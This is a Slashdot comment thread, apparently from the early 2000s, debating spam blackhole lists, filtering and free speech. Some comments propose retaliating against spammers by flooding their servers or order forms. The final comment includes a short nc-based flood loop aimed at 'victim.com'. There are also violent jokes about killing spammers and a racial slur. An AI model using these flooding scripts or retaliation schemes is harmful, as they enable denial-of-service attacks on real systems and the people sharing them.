Slashdot Mirror
Spam Blackhole Lists Redux
tsu doh nimh writes "Are spam blackhole lists good, bad or indifferent? That appears to be the question they're tackling in this Washington Post story. It has some interesting back and forth between supporters of the lists and those who claim they condone censorship."
J adds: Brad Templeton recently
offered some comments
on the most extreme pro-blacklist position.
By tossing spammers into blackholes...just a thought.
Shouldn't email be open and free for the spammers? They have to make a living some how, it might as well be on the backs of ISPs and suckers.
I like the idea of white-lists, but big companies that send their customer's mass emails like PayPal does will suffer from those even.
Why slashdot? Why not?
And they're not. They go against the spirit of the Internet. What makes it great is that everybody HAS a voice, and when we start talking about who should have a voice and who shouldn't we start to sound a lot like fascists. Doesn't matter that it's speech we don't agree with, because it's just a matter of time before the whole thing is so watered down that nobody in their right mind will bother to use it (like amateur radio nowadays...)
Why don't we just create a system where we all only accept mail that has been PGP encrypted with our public keys? That way spammers will have to burn through a whole lot of clock cycles to get their crap out and as an added benefit, we will get a bit more privacy.
for you average folks,
pop ups cause far more frustration, especially brilliant digital and the like....it renders them practically powerless until they call and plead for me to clean up their windoze pc.
spam is something just spend a little more time deleting...but at least their computers are usable.
I think black hole lists are a great thing, but I will admit, they are certainly censorship, and the customers of an ISP using such a list may disagree with some or all of it.
Perhaps the solution is to design a standard format for a black hole list, and add that functionality to email applications? If the end users had such access for themselves, then they could decide whether they wanted someone else to censor their mail (and whether they wanted to bypass that censorship for certain specific people or networks).
And yes, I know there is software that does this, but it's all proprietary. Is anyone interested in adding a generic functionality to, say, Mozilla? Perhaps the ability to import an XML list of bans from one or more specified URLs, run by volunteer blackhole list sponsors?
Blackholes. Just another thing for spammers to get around, just to sell you penis enlargment products, prime morgage rates, and how to make $50,000 in 5 days. How about a new email system all together. Solve all these dang problems.
No.
More stories about spam than the matrix even!
Maybe spam is a problem after all....
Do you even lift?
These aren't the 'roids you're looking for.
What is this the 20th fucking spam story this week? Let me give you a hint. Don't sign up for stupid shit or keep a special account for doing so. I really don't know how you do it, because I don't get spam. I set up an account in case I wanted to sign up for something, and I don't get any spam in that account either. What are you all doing wrong?
If you have been placed on a blacklist, then something must be wrong with your system(s). If the problem is with insecurity and unrestricted relaying, you must fix that before becoming un-blacklisted. If the problem is with a customer, you must deal with them before you can have your IP/domain removed from the blacklist. We need a central service to look at cases and see when someone is "clean." Until they are, there system could still contribute to the spam problem and must be blacklisted.
I'm wondering what the slashdot fans seem to lean towards. Is it viewed as better, or easier, to simply flip on a few RBLs and prevent the messages from ever touching your server...or would you rather use these alongside sorting technology to channel spam towards a designated folder?
Spamassassin and the like do a decent job of helping the spam problem, but my users still complain that their SPAM box has 80 messages a day...even if they get no false positives.
Personally, I'd rather have control over this than my ISP...as at least I can control how I choose to filter or not to filter. And I think the brute-force nature of an RBL often offers piece of mind but without adequate logging or reporting to guarantee you're only blocking what you intend. I'll settle for a full SPAM box any day...
-Barkeep, a draft of your most hazardous brew, for the world is slowly stepping into focus, and I don't like what I see.
What do you call 100 spammers, chained together, and tossed into the ocean to drown?
A start...
Spam is the direct result of an abuse of the existing system(s). It costs companies money, money that they would not be spending otherwise. Spam is not like traditional advertising, like in TV, in which the advertiser actually pays for the ads (since they are usiing the hosters resources and/or popularity). On the contrary, the Spammers pay no fees, and force the hosts to take financial losses.
Immediate death is the answer. Kill them. They are like animals. AND WE SHOULD TREAT THEM LIKE ANIMALS!!!!!!!
SPEWS' WHOIS record isn't really hiding anything when you ask the right server:Whether or not that address really exists, I don't know - but I doubt SPEWS is about to put obviously bogus information (e.g. not@available.org) in their WHOIS record. The spammers would just file a complaint with ICANN.
"BSD: Free as in speech. Linux: Free as in beer. Windows 10: Free as in herpes." --Man On Pink Corner in #52607549.
...are just as bad as most analogies.
What is the difference between asking ISPs to cut spammers and sking ISPs to cut users, who set up porn websites?
Well, the latter is not against the TOS of the ISP. The first one is.
The latter is not threatening to destroy Email. The first one is.
The latter is not stealing. The first one is.
But I guess this one's just another personal opinion of an EFF Director, and not representitive of EFF's opinion on these issues...
Proletariat of the world, unite to kill spammers. Remember to shoot knees first, so that they can't run away while you slowly torture them to death.
In Soviet Russia, I ruled you
Popups are merely web content, presented on pages that you actually choose to visit - web sites that you willingly expose yourself to. Spam is forced upon you whether you like it or not, and ends up costing both your ISP and you money to prevent.
See, you can say anything you want on the Internet... regardless of blacklists or whitelists. Provided, of course, that you host the data you want to distribute (or at least, pay someone else to host it).
Spam doesn't work the same way as something like a webpage (or Usenet, or IRC, etc). With most systems (HTTP for example), you must actively request the data you want. With email, the spammer makes that decision for you. That's the real problem with email, it's the IETF's equivalent of the Windows Messaging system (which, coincidentally, also gets spammed).
I did some development of push technologies for wireless devices. Preventing unwanted (from the network operator's point of view) push traffic out was a big priority. Email is, essentially, a push service as it's currently implemented, anyway.
Personally, I am leaning towards using a "web of trust" system, with confirmed authentication to prevent relaying of spoofed email. Sure, open relays should be legal, but that doesn't mean anyone has to accept mail from them.
Anyway, the point is, if you say something on your website (such as "niggers are great"), I do not have to read it. However, if you send me a nice big jpeg, with a smiling porch-monkey, that says "niggers are great", I end up having to deal with it. If I felt the need for a larger penis and an unaccredited degree, I'll bet Google could help me find places to get that... I don't need someone telling me shit I don't want to know.
Down with Saudi Arabia!!!
MOVE! It's not that hard.
The SBL and other blackhole lists are a valiable tool in the war on SPAM. The problems with their use arise only when upstream providers of client email services, make use of such systems either without the knowledge of the end users or without providing those users optionality in the use of the system. I and many other readers of /. run their own mail servers for recipt of personal email rather than depend on the mail services of their ISPs. These indevidual mail servers can be configured as you see fit with as lax or stringent mail acceptance rules as desired. When upstream providers of mail services implement such systems there is the possibility that the end users would be unaware of the mail they were not recieving. These systems must be implemented with discretion.
As for the consequences for the sender, of sending to a recipient who may not recieve the mail, due to the appearance of the sender's IP address on the SBL or other such lists; the sender is responsible to insure that they recieve service from a reputable ISP who does not cater to spammers. This presumes that due diligence was performed before any IP is added to an SBL list. This also asumes that any mail recipient using such lists is responsible for using a reputable list provider where they are confident of the due diligent performed in generating the list. The whole system (not unlike many other elements of internet architecture) depends on the good faith / good will of the participents.
The primary responsibility lies with the email recipient who selects an SBL type list that is as lax or stringent about the content of the list, as the email recipient is comfortabe with, since the relative levels of stringency maps directly to how much legitimate mail that recipient will have rejected.
--CTH
--Got Lists? | Top 95 Star Wars Line
Darwin's theory included the idea that:
The organisms whose variations best fit them to the environment are the ones who are most likely to survive, reproduce, and pass those desirable variations on to the next generation.
What's going on!? Spammers aren't best fit! They really SHOULD be drowning in the ocean. I certainly don't want them reproducing!
Comment removed based on user account deletion
There will always be some sites improperly secured that allow the spammers to relay their material. I find almost all the emails I get now are bounced through DSL boxes. Blackholing them doesnt help because you're actually blacklisting legitimate users and the spammers themselves are hidden. Having said that, I think such blackholes are important as an incentive to force ISPs to enforce their Terms of Usage. A lot of the SPAM i get is bounced through the same ISPs, or ISPs in eastern countries like Taiwan who dont seem to care about complaints.
Former Iraqi Information Minister Mohammed Saeed al-Sahaf
Of course, there are problems with it. The problem with "false positives" occurs with spam filters that solve the problem only after the bandwidth consumption occurs. And there may be many more false postives in this case. But those are from ISPs that support spam. Legitimate users wouldn't be able to have their messages get through, but who would want to support ISPs that are spammers? ISPs need to prevent their bandwidth from being consumed by junk, but how do they explain it when their customers don't get their intended mail? And here a true story: Somehow, a perfectly legitimate ISP found itself on one of the blacklists of the ISP where I used to work.
Perhaps blacklists should only be used to block those that are known to be spammers. It's a brute-force kind of method, and it works well, if used properly.
I have to pay to send out on both, and dont pay to receive either. Make the financial use of email the opposite to internet use, and everyone will be happy. Then its a user pays system, and it would flatten bandwidth use world wide.
If you want to spew penis enlargement emails, don't be surprised if a lot of folks want to cut you off - figuratively if they can't do it literally...
The Internet seems to have very different laws and standards than American laws. If you want to guarantee everyone's rights you must also guarantee responsibilities. Thus, if you want rights for all, purchases on the Internet should be taxed, any threats posted on any Internet site should be taken as though spoken directly, and you must have 1 black webmaster, 1 hispanic webmaster, and 1 old fart webmaster.
Yes it is a form of censorship, but NO this is not about free speech - SPAM is not free in the cost sense. It costs money to move it around - if you don't believe me, then you have no idea how the internet works.
Sure, if you get SPAM at work, you personally don't absorb the cost... and sure, if you have uncapped internet access, sure you don't absorb the cost. BUT SOMEONE DOES. I don't get SPAM at work but do on some personal email addresses and I, like many other people outside the united states, DO NOT have unlimited download limits.
So those who want the right to speak freely about their latest porn sites, sex products, can pay, albeit a tiny amount of money, per email we receive.
Another thing about free speech, it doesn't mean you can talk as loudly as you want in the middle of the street at 3am - no, you WILL be approached by authorities for disturbing the peace - just try it. SPAM is not really all that much different - you don't have the option of not hearing it, the same way as you don't have the option of not hearing someone blaring music or screaming at 3am while trying to sleep. While the remedy might sound easier to delete a SPAM message than bother the local police for noise complaints, you don't have the noise every day, and hundreds of times.
Free speech might mean not being censored, but it doesn't mean you can do it at other people's expense of inconvenience.
One cannot force another to listen to the message, if they so do not desire. So talk all you want, we're covering our ears.
The f*** they do.
Using them is entirely voluntary.
Or is this yet another attempt to define "free speech" as "speech I like"?
Proletariat of the world, unite to kill spammers
In Soviet Russia, I ruled you
All we need is a nice perl script to suck x bytes of bandwidth from a given IP address. It will attempt to do this with pings, recursive http or ftp, or whatever services it can find. (Real maliciousness such as Pings of Death is unnecessary.)
So Every time a mail server receives a suspected spam, it would fork() off this script against the server that sent the spam. With enough receiving servers configured to do the same, *poof*! The offending mail server is, almost instantaneously, effectively taken off the Net.
Any sufficiently unpopular but cohesive argument is indistinguishable from trolling.
...once it enters American wires. The message may have originated outside the USA, but once inside here, it IS subject to our laws and whims.
Who pays for the storage, distribution and cleanup of spamming? Who pays for the bandwidth of open proxies used by the spammers? Who pays for the increased subscriber fees ISPs are charging because of costs attributed to spam?
Not the spammers...They're the freeloading thieves of the Internet.
It might make sense for you to think before hitting that reply button.
Proletariat of the world, unite to kill spammers
In Soviet Russia, I ruled you
I set my mail server to tag emails rather than block them (move to spam folder on workstation), so i see some interesting things...
When i first tried it 6 months ago, it magically worked, 99% of spam ended up in my spam folder.
Now the blocking ratio is down to about 10%... and here's why. There are 3 MX records for us:
A - linux server - MX = 10
B - msexchange server - MX = 20
C - isp's server - MX = 30
messages delivered to A are tagged (if spam) and forwarded to B. B exists in the MX records for redundancy. C is used because A and B are on the same site.
What i'm finding though, is that spammers send emails to B or C. When A receives the email, it has come from B or C, not the original spammer, so suddenly the blocking doesn't work anymore.
dammit.
It can only work if everyone in your MX record list does it, and my isp is the biggest in Australia so it's an awfully large machine to move.
I have tried adding in more dummy MX records, so that A is first, middle, and last. That seemed to work for a bit but not for long. I might have more success adding different ip addresses for A and peppering the MX list with those... but it's a bit messy.
Still, how effective can a blacklist, however well implemented & maintained, really be? Isn't this one of the easier types of blocks for spammers to get around?
If everyone would just stop trying to grow their penises, turn $5 into $5000, and visit XXChristyXX in her all-nude sorority, spam would wither and die. Lately, I've received some very helpful emails about how to stop spam and make money in the process, secrets I will be sharing with about 16 million fellow computer users very shortly.
--Michael"No live organism can continue for long to exist sanely under conditions of absolute reality;..."
I'm quite surprised nobody has mentioned this yet, or submitted it as a story. He's being indicted for forgery and identity theft.
The lists seem to be similar to the Better Business Bureau (in the US).
.. it is late and I am not sure where my point is going.
"OUR MISSION is to promote and foster the highest ethical relationship between businesses and the public through voluntary self-regulation, consumer and business education, and service excellence." www.bbb.org
The BBB is an organization without authority. It is a voluntary system to People can lodge complaints about a business. People can also inquire about complaints against a business.
I may choose not to do business with any other businesses that do not have what I consider acceptable BBB records. Is it really the BBB's fault? Is their system flawed?
I don't think so. The BBB only provides information. Depending on how much I value the BBB or information, I will choose to do business with a company.
Blacklist are not much different. Organizations sign up for their information *voluntarily* and understand that there may be some "false positives" or disputed cases. Organizations weight the benefits and risks and make their own decision.
If a blacklist proves to block to much email then organizations might try another blacklist or not use one.
Thats it for now.
ok
Keep the Classic Slashdot.
I really don't see what's wrong with this. If I have an ISP and someone is trying to clog up my bandwidth with junk, why can't I block it? What law automatically gives everyone the right to use my network? And if one of my users decides that he wants to get spam (for whatever odd reason) he can switch to another ISP. An ISP is a private corporation and can do whatever the heck it wants. Even if an ISP decided to do something ridiculous like deleting every fifth word in everyone's e-mail there would be nothing wrong with that either. I would quickly switch ISPs, but the ISP isn't doing anything WRONG per se. They can do whatever they want to; I, as a consumer, can choose.
Same thing should be with email. No need to blacklist bad IPs (which might not belong permanently to a spammer) or email addresses (also very temporal). Instead, list all people you trust or all their features that make the being trusted by you. You can guess that I mean e-signatures, public keys and cross-trusted CA network.
P.S. if it's more appropriate, please use for the text above:
Less is more !
Thanks to my friend spam I've been able to negotiate a lower mortgage, increase the length of my penis, spy on my neighbours, and start a lucrative ebay business. Thanks spam!
Support the First Amendment. Read at -1
Perhaps the original author meant that ISPs and the like would infring on (customer) rights by implementing such a blacklist.
RBLs are ineffective at blocking spam and have a farily large rate of false positives. My provider imposes an RBL on me. I don't see a week without a friend or relative complaining that my "email system is broken".
The funny part is that when you check the domain itself, it's not relaying third party emails anymore. It all depends on the sender's sysadmin to remove his/her IP block from a gazillion RBL providers.
For an interesting comparison of a few methods, look at this paper. Clearly, RBLs are not the way to go.
Here's my response to Brad Templeton's post:
What if, at the end of Brad's list, we add:
h) trading child pornography
i) plotting terrorist attacks
j) promoting cannibalism
On his list, items a, f, and possibly g are potentially illegal - the others are clearly legal in the U.S., although they may violate service agreements with some ISPs. Nonetheless, even the possibly illegal actions are perceived as minor crimes, like speeding - if you found out your neighbor was doing these things, you wouldn't start looking for a new place to live. The three items I listed above are different - if any reasonable person even suspected that their neighbor was planning or committing one of those acts, they'd be calling 911 (or your local government's equivalent, unless you live in a country that supports terrorism / kiddie-porn / cannibalism) in a jiffy.
Spam is different from both of these. It's legal in most places, which distinguishes it from the three items I've mentioned, but it's looked upon with nearly equal horror as a violation of trust. If spam were made illegal (particularly porn spam), it could easily be lumped in with these other categories (okay, spam doesn't directly involve killing/torturing other people, but when you get spam that lists your full name and discusses rape, that's bordering on assault).
I think most people would consider it ethically responsible for their ISPs to report kiddie-porn traders, terrorists, and cannibals - at the very least, it would be irresponsible of the ISPs to not report such activities if they were aware of them. The difference, which Brad's post ignores, is that some activities (kiddie-porn, terrorism, spam) cause or can potentially cause DIRECT phsyical or emotional harm to other individuals (and before you argue this point with regard to spam, think carefully about how you would distinguish between soliciting children for sex and sending porn emails to children), while other activities (copyright infringement, NAT) don't.
To (hopefully) temper the debate, I'll add that I would oppose a "one strike and you're out" rule. It's easy to imagine someone being tricked into downloading unpleasant images, and it's easy to imagine someone sending out spam without knowing any better. But after being warned, the punishment the second time should be more severe.
On stereophonic equipment, the monaural sound obtained through multiple channels will enhance your listening pleasure.
No more annoying emails from Mom. Or from anyone else who won't learn how to use PGP.
I'd prefer actual laws against unsolcited comercial email. It's not really speach at all and any judge can tell the difference between a message and an advert. The fact of the matter is that the internet is a pull media and you don't have to shout to be heard. All you have to do is something interesting and people will find out. Spam is not speach, it's an abuse of a public space much like shouting in church or building billboards in the middle of a road.
It's important to distinguish these issues in order to come to the least obtrusive solution. Confusing them plays into the hands of large ISPs such as M$ and AOL who would love to be the only people alowed to annoy everyone with spam, a situation analogous to radio broadcasts. These "service" providers are screaming about how span is ruining the "internet", yet they do all in their power to leave their users powerless to do anything like run a mail server or a web site for any purpose. They also are using their own blackhole lists as a club against smaller ISPs, without giving their users a choice of spam filter. These are the policies most against the spirit of free speech and it's obvious that these "service" providers who abouts their own users would love to eliminate their competition and so end the internet as we know it.
Friends don't help friends install M$ junk.
i noticed this chunk of the article
"Blacklist operators call this "collateral damage," admitting that it is an unfortunate side effect. But for people like Haselton, who can go unaware for weeks that their messages are dissolving into the ether, collateral damage can seriously hinder someone's ability to communicate via the Internet."
Unaware? Why the fuck didnt he check his smtp logs and notice all the 553's ? When you hit a mail server that rbl's you, it sends you a 553 bounce.
Also, many user's mail servers will notify the sender of the bounce and give them a copy of the bounce message so they know why it got bounced.
Collateral damage is why you NEVER ever host your servers with a spam friendly outfit. Our company recently hosted a client's email server, and the FIRST thing we did was run the colo against every blacklist we could think of. We also asked them their policy on handling abuse emails, and spammer termination. Read news.admin.net-abuse.email , its full of good info on how to avoid spam friendly hosters.
Lawyers, MBA's, RIAA? A jedi fears not these things!
If this or any of the other methods to curb spam condone censorship, then so do the 'OFF' buttons on my radio and television.
What you meant to say:
We are not afraid of the Spam. Allah has condemned the spammers and they will all die. There is no spam on the internet. The spammers have been defeated in battle after battle. They will commit suicide on the firewalls of our ISPs. God will roast their stomachs in hell.
I've found it easy to use and it automatically configured and read in my contacts from Eudora. I hate Outlook, but I think it's also supported.
Any e-mail I get, I can block with some type of rule. I even wrote a regular expression to detect comments inside words (a new trick of theirs).
Ever wonder why IM has taken off like it has, you don't get fucking spammed.
:-)
Blacklists suck, they don't work. Blacklist an ip address or range and a new guy gets it and can't send mail, real fucking smart and real fucking frustrating to be the admin, use the reverse domain name all you want, but don't involve the ip address.
Do you think ISPs want spammers, spammers are a pain in the ass to deal with, they are the squeeky wheel at an ISP and they rarely pay their bills after bitching about everything.
An extension to smtp and pop3 is needed, smtp stopped working years ago and people now ignore their email, often you need to call someone to check their email and search for you amongst all the spam in their box.
I'm an admin, not a programmer, but I would do it this way if I was a programmer.
mail is received, the host starts out with a zero rating and the user does as well.
A global bayesian filter then ranks this piece of email, the email is then delivered to a users box with the rating attached for the domain and the user.
The user may sort by this rating to filter out spam from non spam, it is optional at this point, but if the user is using software with the necessary extension, the user can then check if the email is spam or good and have the domain's rating adjusted slightly, and the user's rating fully in the negative or positive, if negative the sending user will not have mail accepted again unless someone uprates the user.
If enough complaints arrive from the sending domain, the domain is blackballed and cannot escape since multiple users have decided that this domain is sending inappropriate email according to the TOS of the receiving ISP.
So, to be more specific, sorry to make this so long, but maybe it will inspire someone.
Connection established with port 25, reverse checked for presence on blackball list, if present drop connection silently. No reverse also gets dropped.
Check for from line with specific user name, if user is on blackball list drop connection silently.
Receive email and grade with bayesian filter using global ruleset, this filter cannot blackball domain or user no matter how much it looks like spam, but can make it nearly so.
Deliver mail, if user confirms mail is spam, blackball user and downgrade domain further, this may actually blackball the domain if enough mail is sent and the filter grades it badly enough (based upon average grade).
Since Dialup and DSL connections do not control their own reverses, it would be trivial to add a simple filter that would refuse mail delivery from these sources, except from their own isp, and then the outgoing mail would be run through a filter, if the rating dropped for the user into negative territory as reported by receiving servers the user would lose their bulk smtp privledges and have thier outgoing mail throttled in a severe fashion with all mail containing bcc and cc mail rejected, and the number of emails per hour limited to stave off potential damage.
The SMTP extension comes into play with a network of these mail servers, blackballed domains would be automaticlly sent to a neighbour in p2p fashion, but ratings would only be accepted if the neighbour server had a valid key, that would be exchanged amongst admins and a network of trust would form.
If a domain becomes blackballed, a user/domain notification takes place alerting that site to the fact mail from their domain/user is not being accepted, at this point an admin could get involved, but my guess is that more often than not the domain will remain there.
Anyhow flame away, my asbestos suit is on
Plus, email marketing WORKS.
24/7 Bulk Mailing Service has 1 opening..
Your message emailed to millions and millions every day non stop 7 days a week.
Average between 1-3 million per day depending on message size etc.
You will receive more leads and business than you ever imagined.
Price is $2500.00 per week.
Other bulk mailers charge from $500-$750 or more per each million emails sent.
With our 24/7 plan, you only pay for the first 5 million, and the remaining 15-30 million are free.
We only have one opening available, so respond now if you are interested.
Click HERE for info.
----
Save the Planet, Save the Trees! Advertise via E-mail.
DELETE WITH ONE SIMPLE KEYSTROKE!
No wasted paper!
It's absolutely your choice. But the first amendment is not just the law, it's a good idea. What people worry about is not the actions of you on your system -- though we might question the wisdom of you refusing mail from innocent people as a means to pressure them -- but the actions of large groups of people, acting in concert, to block the communications of non-spammers.
Even those people have a right to gather and do that, but it can still be a bad idea, worthy of opposition.
Has it been over a year since you last donated to the Electronic Frontier Foundation
If you live in the USA, the Bill of Rights enumerates your right of free speech. That does not make it an absolute right. Try exercising your right to free speech on my property and I will have you arrested for trespassing.
Mea navis aericumbens anguillis abundat
Agreed. And on a practical level, if I didn't use RBL to block overseas spam, I'd be paying $NZ137 ($US80) per month just in the bandwidth charges.
Recycle PCs and build a wireless community network www.hillsborough.org.nz
most ISP's sell this as a SERVICE. which means, their customers are knowingly agreeing to the means.
if i tell my customers that spam will be filtered by blacklisting known spam havens. they cant complain, they are paying for that service, if they do not like my methods, they can move on to a different ISP. i am providing the service that my customers demand
Open relays on DSL lines are no longer valuable if we add a DNS field for SMTP servers authorized to send for a domain. Then, you need to actually own the domain to send mail for it (to servers that require the DNS field). Anonymity gone.
I don't mind server blackhole lists, where connections from certain smtp servers are refused, but blackholing individual email addresses can cause a lot of problems. The most offensive spam usually doesn't include a real from address, and sometimes a from address is randomly selected from their spam victim list. I have on occasion recieved bounced spam that was sent with my email address. I would not like to be blocked because some blackhole list maintainer decided to add my email without verifying if I'm a spammer.
This may be unrelated, but AOL often blocks my email replies to tech support requests from AOL users. It annoys me. They never even give a reason why I'm blocked.
There are other fairly reliable ways to filter spam, without resorting to lists. Mozilla's bayesian filtering seems to work pretty good, though I haven't yet recieved enough personal email to thoroughly train it.
Since the american government is in no way involved with this issue, your 1st ammendment is not relevant.
You might also want to consider that legislative solutions are rarely effective across borders (although you fucking imperialist asshole americans are working on that).
"To blow recursion, you must first blow recus
It's simple - when a mail comes in you send an e-mail back to the sender with a cookie in the subject line. That e-mail requests they send you a confirmation e-mail to get onto your whitelist, which also causes the original e-mail they sent you to be de-queued and delivered.
If you feed your inbox/archives into your whitelist, 99% of people who e-mail you won't even notice the system is running.
I used to get about 200 spams a day. I tried RBLs, I tried spamassassin. None of it worked reliably - RBLs were only catching about 20% of my spam and spammers now get around spamassassin by looking at the rules when they craft e-mails. False positives were also a problem - sure, it's quicker filtering suspected spam into a spam folder for batch-checking, but it's still a serious hassle with >80 dubious borderline spams a day, and tens slipping straight through the spamassassin/RBL net into your inbox.
Happily for those of you running your own mail servers (or sitting on a *nix box which delivers mail locally via procmail), you can get a program which will do this for you for free. It's called Active Spam Killer, it's written in Python, and you can get it here.
Doesn't seem to run well with the spirit of Free Speech
In my view everybody has the right, absolutely, to free speech. However, I have the right, absolutely, not to be forced to hear it, or even know that somebody is speaking at all, if that is my wish.
Call me old fashioned, but I like a dump to be as memorable as it is devastating - Bender
I'm not American (though I am here now) but that was my point. The U.S. 1st amendment isn't just a law, it's a good idea. It's a principle to be followed in our private lives, too.
Has it been over a year since you last donated to the Electronic Frontier Foundation
I don't like the idea of blacklisting IP netblocks, and here's why: when you see spam coming from any given host, it's rarely the netblock that's the problem, rather it's always the spam content that's the problem!
If you understand that point then you can see why all the collateral damage occurs unnecessarily. You're shooting down the wrong target. We're doing it now because it's easier (blackhole IP, bandwidth saved) but the consequence is too great to ignore: we're fracturing Internet-wide communication more and more every day!
We should focus instead on content-based spam filtering, and share that knowledge to improve efficiency. Accuracy skyrockets and collateral damage virtually disappears! You can use intelligent software like spamprobe to classify mail as spam, for instance. There's also the Distributed Checksum Clearinghouse, which lets mail servers around the world determine what's spam based on collective mail data.
A million mail servers sharing with each other what they know about the appearance of this week's spam would be killer. I'd love to see that.
.. your emininent truthfullness. I think total blocking of any compromised machines makes perfect sense, I wish it was so complete of a "blockage" or blacklisting that those machines couldn't surf. This will cause calls to ISPs and tech support. Eventually it will be discovered that these internet users car is leaking toxic waste onto the information super highway. Machine gets fixed, driver gets a good education on proper maintenance.
Why is this wrong? Where would it be harmful in the long run to both educate and properly secure ALL the users and computers that connect to the net? Lets think longer range here. SPAM (and viruses and worms and etc) is/are everyones problem who uses the net, so the solution will require everyones cooperation. Where is it carveth in stone that SPAM, and the solution to thereof, should only be restricted to a few harried and dedicated volunteers and sys admins? I say, share the pain, share the rewards.
There is no good, bad, or indifference to the use of RBL lists. They are the currently the only way to combat, what is in essence, criminal behaviour. There are no first amendment rights issues involved here. Read it for yourself if you think otherwise, (http://www.billofrights.org/).
= fd_top), think about a new profession. Soon.
These people steal bandwidth and services from both the originating and the receiving companies and ISPs. They pedal blatantly false products (Are you stupid enough to think that you can enlarge the flaccid size of your penis by swallowing a pill?), dubious services (Would you re-finance the mortgage on your home with someone who uses an advertiser that steals services from someone?), and porn (If you want it, go find it yourself.).
As a mail system admin, I have to deal with this on a daily basis. It gets worse every month (or 42 days) and I see no real relief coming anytime soon from either the states or the feds, because they are so slow on the uptake. So my feeling is this, if you're on this list of jerks (http://www.spamhaus.org/rokso/index.lasso), then you're blocked, period. If you're in China, Korea, or Brazil, move. If you're an e-mail marketer, change professions. If you're a real spammer like this jerk (http://news.com.com/2100-1032_3-1001513.html?tag
If you happen to be a real company or user that has an account with or a site hosted by any of the ISPs that host these jerks and refuses to do anything about them, you're blocked until they're gone or you change providers. When you do change, remember to tell your ISP *WHY* you're changing to a different company.
I do have a bit of sympathy for Mr. Haselton, but not much. I'm sure MAPS tested his server for relay capability. He would have noticed if he, or his admin, was reading the logs. They do give you a month to fix your problem/appeal. If he got caught out from no fault of his own, like it seems he did, he could change to a different ISP. Did he even try?
I've got your sig, right here.
Adding a blacklist at the receiving end will only help the user using it, and one can only hope that spammers will eventually realize that much of their traffic is simply not getting through, and figure out a different sort of scam to pull on people. Unfortunately this doesn't solve some of the more serious problems with spam, such as congestion of mail servers and backbone pipes. I've heard some statistics quoted that some 80% of traffic on much of the core routers appears to be spam. A blacklist in the sense being described is no solution to this at all.
Much better would be blacklists for known open relays, and strong (i.e. cryptographic) authentication for mail servers. This is arguably not censorship, as you're merely cutting off those people who aren't good neighbors, people who don't bother to play nice with everyone else, which is what the Internet really is all about. The RFC's are just rules we all agreed to have, and anyone who doesn't bother to follow them is in effect voluntarily cutting himself or herself off from everyone who does follow the rules.
I think that much of the spam is going through illicit channels and channels made by careless fools who don't bother to read the RFC's. Cutting off such bad neighbors will go a long way towards curbing the spam problem.
Qu'on me donne six lignes écrites de la main du plus honnête homme, j'y trouverai de quoi le faire pendre.
Of course, if the government (any government) wanted to mandate blacklists, it would be a horrible idea! And I'd be right along with everyone else -- against it.
Now that that's off my chest, I think the biggest misunderstanding about DNS blacklists is how to use them. Most sites use them as absolute blocks. That is, if any relay on an incoming email is found in a single blacklist, then that message is blocked. I've tested hundreds of blacklists and no single blacklist that includes any appreciable number of spammer IP addresses is absolutely reliable.
The solution is technical and simple: use more than one blacklist. Weight them. Use math and statistics to achieve good results based on past accuracy rates. Don't use the ones that work poorly such as SPEWS which has a poor false positive rate, or just weight them much lower than better blacklists.
Incidentally, this is exactly the approach that SpamAssassin takes. We let our genetic algorithm decide what weight to use for each blacklist. It's not perfect, but boy, does it help keep spam out of our inboxes! Actually, this is the SpamAssassin philosophy about email filtering in general. We don't place all our bets on any single filtering method. We use every method at our disposal and let statistical methods decide what works best and how to weight them. If spam evolves, we evolve. If the attacks on Bayesian filtering prove to be too powerful, we'll have other methods to fall back on. Sorry for the advertisement, but I think the "all or none" approach is exactly why some people are so against blacklists. That's also why most legislative anti-spam proposals are such incredibly bad ideas.
Daniel
Who pays for the bandwidth /.ed, the images load slow as hell, usualy I can open and delete them befor the first image is loaded, so appearently the bussinesses that hire the spammers arn't paying for bandwidth either!
I've noticed that when I've opened HTML SPAM that the server are pretty well
Apocalypse Cancelled, Sorry, No Ticket Refunds
You could atleast *scan* today's headlines before sticking your own thumb in your ass, though.
Right now, I would settle for *any* authentication of mail servers. Even something as simple minded as adding a DNS record that verifies that a server is authorized to send email for a domain would be a *huge* step forward at the moment.
It's ridiculous that they can spam anyone as anyone through open relays and proxies, so that we can't determine their real identity.
If free speech included the right to be heard, then everyone who doesn't own a computer that can receive your messages is also censoring you...
If 90% of the internet decides that they don't want to receive anything from you...
Sucks to be you.
We're not talking about one person, or even one group, deciding who does and doesn't get to speak. Spam blacklist only work because each ISP that uses the black list decides that it should work for them. If they don't like who is on the black list, they'll use a different one.
Perfect system? Of course not. Better than no system? Yeah.
Stomping "your rights"? No way. There's no "right" to be connected to the internet. The internet, past your connection, is EVERYONE ELSE'S computers. You don't have any greater right to speak there than you do in the New York Times.
paintball
You just probably won't get much email until you teach your friends, customers, etc. to send their email that way.
- Chris
paintball
By that logic we might conclude that amoebic dysentery shouldn't exist either. :)
A parasite is a parasite is a parasite. Spammers are ideally suited to the internet environment at the moment--that's why this entire discussion is about trying to alter that environment to make it less livable (hopefully, outright fatal) to them.
After all, in some way the spammers are DOS'ing the internet as a whole, increasing the demand and use of potentially shared resources such as bandwidth, mail servers and so on. As often happens there does not seem to be any reasonable way to actually charge them for these resources. Legal solutions seem unlikely to work - and given the legal solutions we've seen proposed recently, are likely to even make things worse.
So, what can the average user do? Things like spam filtering on the client don't solve the whole problem.
So, do what you can. Go to any website mentioned and order a dozen or dozen dozen of their product. Don't use your own credit card or real name or address - after all they don't. Send them a couple hundred emails complaining. (Though you'll notice that most spammer products don't have accessible email addresses.) If they're in China send email to each new spammer with addresses of all the previous Chinese spammers and talk about support for Free Tibet and the Falun Gong.
Do such actions feel unethical to me? Yup. And I'll admit that I don't usually do such things myself - although between spammers and telemarketers I'm getting closer and closer to serious nastiness. But do we have a choice? If the choice is to respond to spam with DOS or the recently proposed sleazy way to legalize mass email marketing, which choice will make email usable for people?
Its the prisoner's dilemma (or the tragedy of the commons) over and over again, sadly. The best solution must be to make the payoff for "defectors" lower or make their cost higher.
whois onlinedns.org gives all those not available messages, so which host do I use to actually get real information? I've tried a few with no luck.
I'd like to send them some feedback.
A traceroute does hint that they're in china.
Yes, followed right over a cliff with the baby and the bathwater.
Hooray for principles!
Thanks for reminding me why I don't donate to the EFF.
i spam their order-databases...
/dev/null
:-)
i'll soon rewrite this script to randomize all data, such as headers etc. anyone know if tcp-spoof is possible?
-----
#!/bin/sh
tmpid=1
while [ 1 ]; do
cat victim.txt|sed s/_ID_/$tmpid/g|nc victim.com 80 &>
echo $tmpid
tmpid=`expr $tmpid + 1`
done
---
